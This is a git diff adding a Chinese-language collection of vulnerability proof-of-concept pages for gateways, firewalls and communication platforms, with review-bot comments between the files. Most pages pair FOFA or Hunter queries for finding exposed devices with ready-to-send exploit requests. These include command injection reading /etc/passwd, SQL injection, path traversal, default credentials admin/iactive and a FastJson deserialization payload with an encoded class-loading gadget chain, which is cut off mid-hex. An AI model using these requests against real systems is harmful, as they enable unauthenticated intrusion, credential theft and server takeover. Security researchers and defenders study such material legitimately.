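Review bot: `解密后可登录系统` is the whole impact description, with nothing on what value is encrypted, with which algorithm or key, or where it appears in the response; as committed the file is a screenshot caption. The 简介 paragraph starts with a leading space (` 网动统一通信平台...`), which some renderers turn into an indented block, and `影响版本` names no version. The endpoint is the same as in the preceding ActiveUC file; cross-link the two.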
@@ -0,0 +1,32 @@ +# 网动统一通信平台meetingShow存在任意文件读取漏洞 + +# 一、漏洞简介 + 网动统一通信平台是一个涵盖了多种通信功能的综合平台,通常包括文字、语音、视频通讯等功能,并且可能提供了一系列的通讯工具和服务。这样的平台通常旨在提升用户的沟通效率和便利性,为用户提供一个统一的通信环境。网动统一通信平台meetingShow接口处存在任意文件下载漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。 + +# 二、影响版本 ++ 网动统一通信平台 + +# 三、资产测绘 ++ fofa`title="网动统一通信平台(Active UC)"` ++ 特征 + +![1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48.png](./img/rg7PTmSeir6Foadu/1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48-543498.png) + +--- + +# 四、漏洞复现 +```http +GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml&filename=xxx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1715182117189-1a34bfe4-90d0-470b-bb64-7e14114e7587.png](./img/rg7PTmSeir6Foadu/1715182117189-1a34bfe4-90d0-470b-bb64-7e14114e7587-702187.png) + + + + + +> 更新: 2024-10-22 09:40:53 +> 原文: \ No newline at end of file diff --git a/网动统一通信平台存在默认口令漏洞.md b/网动统一通信平台存在默认口令漏洞.md new file mode 100644 index 0000000..7b364b4 --- /dev/null +++ b/网动统一通信平台存在默认口令漏洞.md @@ -0,0 +1,28 @@ +# 网动统一通信平台存在默认口令漏洞 + +# 一、漏洞简介 + 网动统一通信平台是一个涵盖了多种通信功能的综合平台,通常包括文字、语音、视频通讯等功能,并且可能提供了一系列的通讯工具和服务。这样的平台通常旨在提升用户的沟通效率和便利性,为用户提供一个统一的通信环境。网动统一通信平台存在默认口令漏洞 + +# 二、影响版本 ++ 网动统一通信平台 + +# 三、资产测绘 ++ fofa`title="网动统一通信平台(Active UC)"` ++ 特征 + +![1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48.png](./img/8SfqFBE2nPpYVL4X/1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48-314671.png) + +--- + +# 四、漏洞复现 +```http +admin/iactive +1/iactive +``` + +![1728896591772-7a5c1305-1889-4603-b007-b881fe862424.png](./img/8SfqFBE2nPpYVL4X/1728896591772-7a5c1305-1889-4603-b007-b881fe862424-613866.png) + + + +> 更新: 2024-10-22 09:40:55 +> 原文: \ No newline at end of file diff --git a/网康NS-ASG应用安全网关存在远程命令执行漏洞.md b/网康NS-ASG应用安全网关存在远程命令执行漏洞.md new file mode 100644 index 0000000..a45b0d3 --- /dev/null +++ b/网康NS-ASG应用安全网关存在远程命令执行漏洞.md 
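Review bot: in the meetingShow file, the title says 任意文件读取 while the 简介 says 任意文件下载; use one term. `filePath=WEB-INF/web.xml` is a good harmless probe, but state that the indicator is the `web.xml` content in the response body. The 简介 paragraph has the same stray leading space as the sibling files, and `影响版本` has no version.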
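Review bot: in the 默认口令 file, `admin/iactive` and `1/iactive` are fenced with the `http` tag although they are not HTTP, and the file does not say which login form they apply to or whether `1` is a real built-in account; the 简介 ends by restating the title. Put the login path and the condition under which the defaults remain (not changed at install) in the text.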
@@ -0,0 +1,47 @@ +# 网康 NS-ASG应用安全网关存在远程命令执行漏洞 + +# 一、漏洞简介 +网康科技有限公司是中国技术领先的网络应用管理设备提供商,专注于网络应用管理领域最前沿的趋势研究和分析,为用户提供先进的网络应用管理技术、产品与解决方案,旨在帮助用户实现“上好网 用好网”的网络管理目标。网康应用安全网关系统存在远程命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。 + +# 二、影响版本 ++ 网康应用安全网关系统 + +# 三、资产测绘 ++ hunter`web.title=="网康 NS-ASG 应用安全网关"` ++ 特征 + +![1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be.png](./img/Q3wbZCP7nLEzpjt6/1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be-739231.png) + +# 四、漏洞复现 +1. 执行如下执行POC语句,同时执行id命令并写入/protocol/1.txt。 + +```plain +POST /protocol/index.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 76 + +jsoncontent={"protocolType":"getsysdatetime","messagecontent":"1;id>1.txt;"} +``` + +![1700040012683-b9714aa9-b738-429c-8700-a475eff2249d.png](./img/Q3wbZCP7nLEzpjt6/1700040012683-b9714aa9-b738-429c-8700-a475eff2249d-740368.png) + +2. 访问`/protocol/1.txt`路径,获取命令执行结果。 + +```plain +/protocol/1.txt +``` + +![1700040060126-ae08016a-0a0f-4e4c-9821-38261430e5ce.png](./img/Q3wbZCP7nLEzpjt6/1700040060126-ae08016a-0a0f-4e4c-9821-38261430e5ce-691820.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/网康NS-ASG应用安全网关源代码泄露漏洞.md b/网康NS-ASG应用安全网关源代码泄露漏洞.md new file mode 100644 index 0000000..83c3df8 --- /dev/null +++ b/网康NS-ASG应用安全网关源代码泄露漏洞.md 
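Review bot: step 1 writes command output to `/protocol/1.txt` in the web root and step 2 reads it back, but nothing says to remove the file afterwards, so every test leaves a world-readable artifact on the device; add a cleanup step. The injection point (`messagecontent` inside the `jsoncontent` JSON posted to `/protocol/index.php` with `protocolType` `getsysdatetime`) is visible only in the raw request and should be named in the 简介. `Content-Length: 76` matches the body.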
@@ -0,0 +1,25 @@ +# 网康NS-ASG应用安全网关源代码泄露漏洞 + +# 一、漏洞简介 +网康科技有限公司是中国技术领先的网络应用管理设备提供商,专注于网络应用管理领域最前沿的趋势研究和分析,为用户提供先进的网络应用管理技术、产品与解决方案,旨在帮助用户实现“上好网 用好网”的网络管理目标。网康NS-ASG应用安全网关源代码泄露漏洞。 + +# 二、影响版本 ++ 网康应用安全网关系统 + +# 三、资产测绘 ++ hunter`web.title=="网康 NS-ASG 应用安全网关"` ++ 特征 + +![1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be.png](./img/R8mmLlumkKNVglOe/1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be-489191.png) + +# 四、漏洞复现 +```java +/protocol/nsasg6.0.tgz +``` + +![1704937144520-c89aac48-4a8b-4382-8cbb-a8c1cca3cdf8.png](./img/R8mmLlumkKNVglOe/1704937144520-c89aac48-4a8b-4382-8cbb-a8c1cca3cdf8-167281.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/网康下一代防火墙远程命令执行漏洞.md b/网康下一代防火墙远程命令执行漏洞.md new file mode 100644 index 0000000..bb7fd4b --- /dev/null +++ b/网康下一代防火墙远程命令执行漏洞.md 
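Review bot: the only technical content in 网康NS-ASG应用安全网关源代码泄露漏洞.md is the path `/protocol/nsasg6.0.tgz` in a `java`-tagged fence; tag it plain, and have 漏洞简介 say what the archive contains and why it matters (it currently just restates the title), for example that it is the application source that makes the `/protocol/index.php` issues on the sibling pages auditable. The `6.0` in the filename is the only version hint on the page; if it is the affected release, record it under 影响版本 instead of leaving only the product name.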
@@ -0,0 +1,50 @@ +# 网康下一代防火墙远程命令执行漏洞 + +# 一、漏洞简介 +网康下一代防火墙(NGFW) 是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护帮助用户安全地开展业务并降低安全成本。该设备存在远程命令执行漏洞,通过此漏洞攻击者可远程写入webshell木马,远程控制防火墙。 + +# 二、影响版本 ++ 网康下一代防火墙(NGFW) + +# 三、资产测绘 ++ hunter`app.name="网康 NGFW"` ++ 特征 + +![1700672214892-89badb4c-3b88-4fad-9bc7-d88920136c28.png](./img/yXZacA-Wy_HtI0DL/1700672214892-89badb4c-3b88-4fad-9bc7-d88920136c28-725692.png) + +# 四、漏洞复现 +执行命令`cat /etc/passwd`,将命令执行结果写入`/var/www/html/stc.txt` + +```python +POST /directdata/direct/router HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=mrii60g5vlu8hnen3v0cdk13t6; ys-active_page=s%3A +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +Content-Type: application/json +Content-Length: 172 + +{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/stc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} +``` + +获取命令执行结果 + +```python +/stc.txt +``` + +![1700672285345-7cc2adaa-94f7-4c3c-bd2f-7cc73470a49f.png](./img/yXZacA-Wy_HtI0DL/1700672285345-7cc2adaa-94f7-4c3c-bd2f-7cc73470a49f-238968.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md b/网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md new file mode 100644 index 0000000..41abd2c --- /dev/null +++ b/网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md 
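Review bot: the request in 网康下一代防火墙远程命令执行漏洞.md carries `Cookie: PHPSESSID=mrii60g5vlu8hnen3v0cdk13t6; ys-active_page=s%3A`, so the reader cannot tell whether `/directdata/direct/router` is reachable unauthenticated or whether a valid session is a precondition; state which, and drop the cookie if it is not needed. The injection is the `data` array of the `SSLVPN_Resource.deleteImage` call (`/var/www/html/d.txt;cat /etc/passwd >/var/www/html/stc.txt`), which again writes a file under the web root that the page never removes; add a cleanup step. The two fences hold an HTTP request and a URL path but are tagged `python`; tag them `http` and plain as the other pages do.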
@@ -0,0 +1,22 @@ +## 网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330) + + +## poc +``` +POST /protocol/index.php HTTP/1.1 +Host: +Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 263 + +jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]} +``` diff --git a/网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md b/网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md new file mode 100644 index 0000000..4cf7538 --- /dev/null +++ b/网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md 
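Review bot: 网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md has only a `## poc` section, with none of the 漏洞简介 / 影响版本 / 资产测绘 / 漏洞复现 structure the other 网康 pages use, so a reader does not know how to find targets or what a positive result looks like; at least say that the `updatexml(1,concat(0x7e,(select+version())),1)` payload in `IPAddr` is error-based and that success is the database version string prefixed with `~` (0x7e) in the error returned by the server. The request sends `Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de`; say whether the `addmacbind` message needs a session, and cross-reference the RCE page that hits the same `/protocol/index.php` with a different `protocolType`, since both are the same unauthenticated-looking dispatcher.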
@@ -0,0 +1,38 @@ +# 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞 + +# 一、漏洞简介 +网御上网行为管理系统具备一体化网络接入、认证、管控、优化、审计、运营等功能,是新一代高性能的上网行为管理产品。面向政府、军工、金融、教育、企业等多行业不同客户网络业务场景,简化管理,节约客户成本,提供业务效率和价值。网御ACM上网行为管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 网御上网行为管理系统 + +# 三、资产测绘 ++ hunter:`app.name="LeadSec 网御星云 ACM"` + +![1692091516996-e14a3fea-afe4-498a-8cb0-cb8bf8eb6ad2.png](./img/smjw_DZ0Z3nT853F/1692091516996-e14a3fea-afe4-498a-8cb0-cb8bf8eb6ad2-429151.png) + ++ 登录页面 + +![1692091551867-d771bb3c-8490-4b04-b8bf-11142bcb954e.png](./img/smjw_DZ0Z3nT853F/1692091551867-d771bb3c-8490-4b04-b8bf-11142bcb954e-939492.png) + +# 四、漏洞复现 +```plain +GET /bottomframe.cgi?user_name=%27))%20union%20select%20user()%23 HTTP/1.1 +Host: xx.xx.xx.xx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +``` + +![1692091602115-e4c1e46d-7de4-4e4b-89b9-e77626b14efe.png](./img/smjw_DZ0Z3nT853F/1692091602115-e4c1e46d-7de4-4e4b-89b9-e77626b14efe-446439.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md b/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md new file mode 100644 index 0000000..78213b4 --- /dev/null +++ b/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md @@ -0,0 +1,17 @@ +## 网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞 + +网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感信息 + +## fofa + +``` +app="网御星云-上网行为管理系统" +``` + +## poc + +```javascript +/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191348040.png) 
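Review bot: 网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md and 网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md describe the same `bottomframe.cgi?user_name=%27))%20union%20select%20...%23` injection and should be one page; keep the structured one and fold in the second page's fofa query `app="网御星云-上网行为管理系统"` and its `md5(1)` probe, which is the better check because the expected response value is fixed (`c4ca4238a0b923820dcc509a6f75849b`) rather than the installation-dependent output of `user()`. Neither page says what the normal response of `bottomframe.cgi` is or where the injected column shows up in it, and the second page fences a URL as `javascript`; tag it plain.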
diff --git a/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md b/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md new file mode 100644 index 0000000..1386fbb --- /dev/null +++ b/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md @@ -0,0 +1,22 @@ +# 网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014) + +网御VPN安全网关存在任意文件下载漏洞,攻击者可利用该漏洞在未经身份验证的情况下下载passwd等敏感文件。 + +## poc + +```javascript +GET /SSL/admin/UserFile?FileName=../../../etc/passwd HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/UXujNlADrykn2NSREuwDWQ +- [国家信息安全漏洞共享平台 (cnvd.org.cn)](https://www.cnvd.org.cn/flaw/show/CNVD-2024-34014) \ No newline at end of file diff --git a/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md b/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md new file mode 100644 index 0000000..af5282e --- /dev/null +++ b/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md 
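Review bot: 网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md fences an HTTP request as `javascript`; tag it `http` as the neighbouring pages do. The traversal depth in `GET /SSL/admin/UserFile?FileName=../../../etc/passwd` (three `../`) depends on where `UserFile` resolves paths, so note that the count may need adjusting, and say what a hit looks like (the `root:` line of `/etc/passwd` in the body). This is the only page in the batch with a 漏洞来源 section; the others should get the same so their 原文: lines are not left empty.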
@@ -0,0 +1,33 @@ +# 网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞 + +网神SecFox运维安全管理与审计系统 authService接口处使用存在漏洞 fastjson 组件,未授权的攻击者可通过fastjson 序列化漏洞对系统发起攻击获取服务器权限。 + +## fofa +```javascript +body="./static/js/vendor.022b3d3adf3423f31f54.js" +``` + +## poc +```javascript +POST /3.0/authService/login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 +Cmd: id +Content-Type: application/json;charset=utf-8 +Referer: https:// +Accept-Encoding: gzip +Connection: close + +{ + "a": { + "@type": "java.lang.Class", + "val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource" + }, + "b": { + "@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource", + "userOverridesAsString": "HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200206a617661782e7363726
970742e536372697074456e67696e654d616e61676572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000b6e6577496e7374616e6365757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007371007e00137571007e0018000000017400026a7374000f676574456e67696e6542794e616d657571007e001b00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00180000000174202b747279207b0a20206c6f616428226e6173686f726e3a6d6f7a696c6c615f636f6d7061742e6a7322293b0a7d20636174636820286529207b7d0a66756e6374696f6e20676574556e7361666528297b0a202076617220746865556e736166654d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522292e6765744465636c617265644669656c642827746865556e7361666527293b0a2020746865556e736166654d6574686f642e73657441636365737369626c652874727565293b200a202072657475726e20746865556e736166654d6574686f642e676574286e756c6c293b0a7d0a66756e6374696f6e2072656d6f7665436c617373436163686528636c617a7a297b0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617a7a416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c61737328636c617a7a2c6a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c61737322292e6765745265736f75726365417353747265616d2822436c6173732e636c61737322292e72656164416c6c427974657328292c6e756c6c293b0a2020766172207265666c656374696f6e446174614669656c64203d20636c617a7a416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428227265666c656374696f6e4461746122293b0a2020756e736166652e7075744f626a65637428636c617a7a2c756e736166652
e6f626a6563744669656c644f6666736574287265666c656374696f6e446174614669656c64292c6e756c6c293b0a7d0a66756e6374696f6e206279706173735265666c656374696f6e46696c7465722829207b0a2020766172207265666c656374696f6e436c6173733b0a2020747279207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a646b2e696e7465726e616c2e7265666c6563742e5265666c656374696f6e22293b0a20207d20636174636820286572726f7229207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e7265666c6563742e5265666c656374696f6e22293b0a20207d0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617373427566666572203d207265666c656374696f6e436c6173732e6765745265736f75726365417353747265616d28225265666c656374696f6e2e636c61737322292e72656164416c6c427974657328293b0a2020766172207265666c656374696f6e416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c617373287265666c656374696f6e436c6173732c20636c6173734275666665722c206e756c6c293b0a2020766172206669656c6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226669656c6446696c7465724d617022293b0a2020766172206d6574686f6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226d6574686f6446696c7465724d617022293b0a2020696620286669656c6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286669656c6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a2020696620286d6574686f6446696c7465724d61704669656c642e6765745479706528292e697
341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286d6574686f6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a202072656d6f7665436c6173734361636865286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173732229293b0a7d0a66756e6374696f6e2073657441636365737369626c652861636365737369626c654f626a656374297b0a2020202076617220756e73616665203d20676574556e7361666528293b0a20202020766172206f766572726964654669656c64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e7265666c6563742e41636365737369626c654f626a65637422292e6765744465636c617265644669656c6428226f7665727269646522293b0a20202020766172206f6666736574203d20756e736166652e6f626a6563744669656c644f6666736574286f766572726964654669656c64293b0a20202020756e736166652e707574426f6f6c65616e2861636365737369626c654f626a6563742c206f66667365742c2074727565293b0a7d0a66756e6374696f6e20646566696e65436c617373286279746573297b0a202076617220636c7a203d206e756c6c3b0a20207661722076657273696f6e203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226a6176612e76657273696f6e22293b0a202076617220756e73616665203d20676574556e7361666528290a202076617220636c6173734c6f61646572203d206e6577206a6176612e6e65742e55524c436c6173734c6f61646572286a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6e65742e55524c22292c203029293b0a20207472797b0a202020206966202876657273696f6e2e73706c697428222e22295b305d203e3d20313129207b0a2020202020206279706173735265666c656374696f6e46696c74657228293b0a20202020646566696e65436c6173734d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6
c616e672e436c6173734c6f6164657222292e6765744465636c617265644d6574686f642822646566696e65436c617373222c206a6176612e6c616e672e436c6173732e666f724e616d6528225b4222292c6a6176612e6c616e672e496e74656765722e545950452c206a6176612e6c616e672e496e74656765722e54595045293b0a2020202073657441636365737369626c6528646566696e65436c6173734d6574686f64293b0a202020202f2f20e7bb95e8bf872073657441636365737369626c65200a20202020636c7a203d20646566696e65436c6173734d6574686f642e696e766f6b6528636c6173734c6f616465722c2062797465732c20302c2062797465732e6c656e677468293b0a202020207d656c73657b0a2020202020207661722070726f74656374696f6e446f6d61696e203d206e6577206a6176612e73656375726974792e50726f74656374696f6e446f6d61696e286e6577206a6176612e73656375726974792e436f6465536f75726365286e756c6c2c206a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e73656375726974792e636572742e436572746966696361746522292c203029292c206e756c6c2c20636c6173734c6f616465722c205b5d293b0a202020202020636c7a203d20756e736166652e646566696e65436c617373286e756c6c2c2062797465732c20302c2062797465732e6c656e6774682c20636c6173734c6f616465722c2070726f74656374696f6e446f6d61696e293b0a202020207d0a20207d6361746368286572726f72297b0a202020206572726f722e7072696e74537461636b547261636528293b0a20207d66696e616c6c797b0a2020202072657475726e20636c7a3b0a20207d0a7d0a66756e6374696f6e206261736536344465636f6465546f427974652873747229207b0a20207661722062743b0a20207472797b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e4241534536344465636f64657222292e6e6577496e7374616e636528292e6465636f646542756666657228737472293b0a20207d63617463682865297b7d0a2020696620286274203d3d206e756c6c297b0a202020207472797b0a2020202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e42617365363422292e6e6577496e7374616e636528292e6765744465636f64657228292e6465636f646528737472293b0a202020207d63617463682865297b7d0a20207d0a2020696620286274203d3d206e756c6
c297b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226f72672e6170616368652e636f6d6d6f6e732e636f6465632e62696e6172792e42617365363422292e6e6577496e7374616e636528292e6465636f646528737472290a20207d0a202072657475726e2062743b0a7d0a76617220636f64653d2279763636766741414144494177516f41435142524367425341464d4b414649415641674156516f4156674258434142594277425a4367414841466f484146734b41467741585167415867674158776741594167415951674159676f414277426a4341426b4341426c4277426d43674263414763494147674b4144304161516f41435142714341427243414273434142744341427543674154414738494148414b4148454163676f414577427a43674154414851494148554b41424d4164676741647767416541634165516f414a5142524367416c41486f494148734b414355416641674166516741666767416677674167416f41675143434367434241494d484149514b4149554168676f414d414348434143494367417741496b4b4144414169676f414d41434c436743464149774b414955416a5163416a676f414f5142384341435043674139414a4148414a454241415938615735706444344241414d6f4b565942414152446232526c4151415054476c755a55353162574a6c636c5268596d786c4151414c614746755a464a6c6358566c633351424141704665474e6c634852706232357a415141455a58686c597745414a69684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576624746755a79395464484a70626d63374151414e553352685932744e5958425559574a735a5163415a6763416b6763416b77634168416341655163416a6763416c4145414344786a62476c756158512b4151414b55323931636d4e6c526d6c735a51454143464e464d53357159585a684441412b41443848414a554d414a59416c7777416d41435a4151413862334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4a6c6358566c63335244623235305a586830534739735a4756794277436144414362414a77424142526e5a5852535a5846315a584e3051585230636d6c696458526c6377454144327068646d4576624746755a7939446247467a637777416e51436541514151616d4632595339735957356e4c303969616d566a644163416e7777416f4143684151424162334a6e